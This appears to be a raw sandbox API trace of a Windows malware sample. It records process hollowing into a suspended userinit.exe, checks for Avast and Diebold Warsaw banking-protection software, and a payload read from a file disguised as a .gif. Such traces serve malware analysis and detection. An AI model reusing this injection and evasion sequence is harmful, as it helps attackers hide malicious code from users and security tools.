[0210.021] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.021] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.021] GlobalUnlock (hMem=0x189000c) returned 0
[0210.021] GlobalReAlloc (hMem=0x189000c, dwBytes=0x44000, uFlags=0x2) returned 0x189000c
[0210.021] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.022] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.022] GlobalUnlock (hMem=0x189000c) returned 0
[0210.022] GlobalReAlloc (hMem=0x189000c, dwBytes=0x46000, uFlags=0x2) returned 0x189000c
[0210.022] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.023] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.023] GlobalUnlock (hMem=0x189000c) returned 0
[0210.023] GlobalReAlloc (hMem=0x189000c, dwBytes=0x48000, uFlags=0x2) returned 0x189000c
[0210.023] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.023] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.023] GlobalUnlock (hMem=0x189000c) returned 0
[0210.023] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4a000, uFlags=0x2) returned 0x189000c
[0210.024] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.024] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.024] GlobalUnlock (hMem=0x189000c) returned 0
[0210.024] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4c000, uFlags=0x2) returned 0x189000c
[0210.024] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.025] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.025] GlobalUnlock (hMem=0x189000c) returned 0
[0210.025] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4e000, uFlags=0x2) returned 0x189000c
[0210.025] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.026] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.026] GlobalUnlock (hMem=0x189000c) returned 0
[0210.026] GlobalReAlloc (hMem=0x189000c, dwBytes=0x50000, uFlags=0x2) returned 0x189000c
[0210.026] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.026] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.026] GlobalUnlock (hMem=0x189000c) returned 0
[0210.026] GlobalReAlloc (hMem=0x189000c, dwBytes=0x52000, uFlags=0x2) returned 0x189000c
[0210.026] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.027] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.027] GlobalUnlock (hMem=0x189000c) returned 0
[0210.027] GlobalReAlloc (hMem=0x189000c, dwBytes=0x54000, uFlags=0x2) returned 0x189000c
[0210.027] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.028] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.028] GlobalUnlock (hMem=0x189000c) returned 0
[0210.028] GlobalReAlloc (hMem=0x189000c, dwBytes=0x56000, uFlags=0x2) returned 0x189000c
[0210.028] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.029] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.029] GlobalUnlock (hMem=0x189000c) returned 0
[0210.029] GlobalReAlloc (hMem=0x189000c, dwBytes=0x58000, uFlags=0x2) returned 0x189000c
[0210.029] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.029] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.029] GlobalUnlock (hMem=0x189000c) returned 0
[0210.029] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5a000, uFlags=0x2) returned 0x189000c
[0210.029] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.030] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.030] GlobalUnlock (hMem=0x189000c) returned 0
[0210.030] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5c000, uFlags=0x2) returned 0x189000c
[0210.030] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.031] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.031] GlobalUnlock (hMem=0x189000c) returned 0
[0210.031] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5e000, uFlags=0x2) returned 0x189000c
[0210.031] GlobalLock (hMem=0x189000c) returned 0x25b100
[0210.079] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1b0c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1b0c10 | out: lpCommandLine="", lpProcessInformation=0x1b0c10*(hProcess=0x144, hThread=0x148, dwProcessId=0x9b0, dwThreadId=0x984)) returned 1
[0210.087] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000
[0210.088] GetThreadContext (in: hThread=0x148, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd3000, Edx=0x0, Ecx=0x0, Eax=0xec2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x16fed8, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0210.125] ReadProcessMemory (in: hProcess=0x144, lpBaseAddress=0x7ffd3008, lpBuffer=0x1b0c74, nSize=0x4, lpNumberOfBytesRead=0x1b0c7c | out: lpBuffer=0x1b0c74*, lpNumberOfBytesRead=0x1b0c7c*=0x4) returned 1
[0210.125] VirtualAllocEx (hProcess=0x144, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0210.126] VirtualAlloc (lpAddress=0x1d54000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d54000
[0210.133] WriteProcessMemory (in: hProcess=0x144, lpBaseAddress=0x400000, lpBuffer=0x1d52c44*, nSize=0x63000, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1d52c44*, lpNumberOfBytesWritten=0x1b0c7c*=0x63000) returned 1
[0210.146] WriteProcessMemory (in: hProcess=0x144, lpBaseAddress=0x7ffd3008, lpBuffer=0x1b0c78*, nSize=0x4, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1b0c78*, lpNumberOfBytesWritten=0x1b0c7c*=0x4) returned 1
[0210.146] SetThreadContext (hThread=0x148, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd3000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x16fed8, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0210.146] ResumeThread (hThread=0x148) returned 0x1
[0210.146] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0210.147] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0210.147] GlobalUnlock (hMem=0x189000c) returned 0
[0210.147] GlobalHandle (pMem=0x1fd0f0) returned 0x1890004
[0210.147] GlobalUnlock (hMem=0x1890004) returned 0
[0210.155] Sleep (dwMilliseconds=0xe74e)
[0220.172] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0220.172] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0220.172] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0220.172] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0220.172] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150
[0220.173] SetFilePointer (in: hFile=0x150, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c8*=0) returned 0x0
[0220.173] SetFilePointer (in: hFile=0x150, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0220.173] SetFilePointer (in: hFile=0x150, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x5e000
[0220.173] SetFilePointer (in: hFile=0x150, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0220.175] GlobalLock (hMem=0x1890004) returned 0x1fd0f0
[0220.175] ReadFile (in: hFile=0x150, lpBuffer=0x1fd0f0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0xee1dc, lpOverlapped=0x0 | out: lpBuffer=0x1fd0f0*, lpNumberOfBytesRead=0xee1dc*=0x5e000, lpOverlapped=0x0) returned 1
[0220.177] CloseHandle (hObject=0x150) returned 1
[0220.177] GlobalLock (hMem=0x189000c) returned 0x25b100
[0220.178] GlobalHandle (pMem=0x25b100) returned 0x189000c
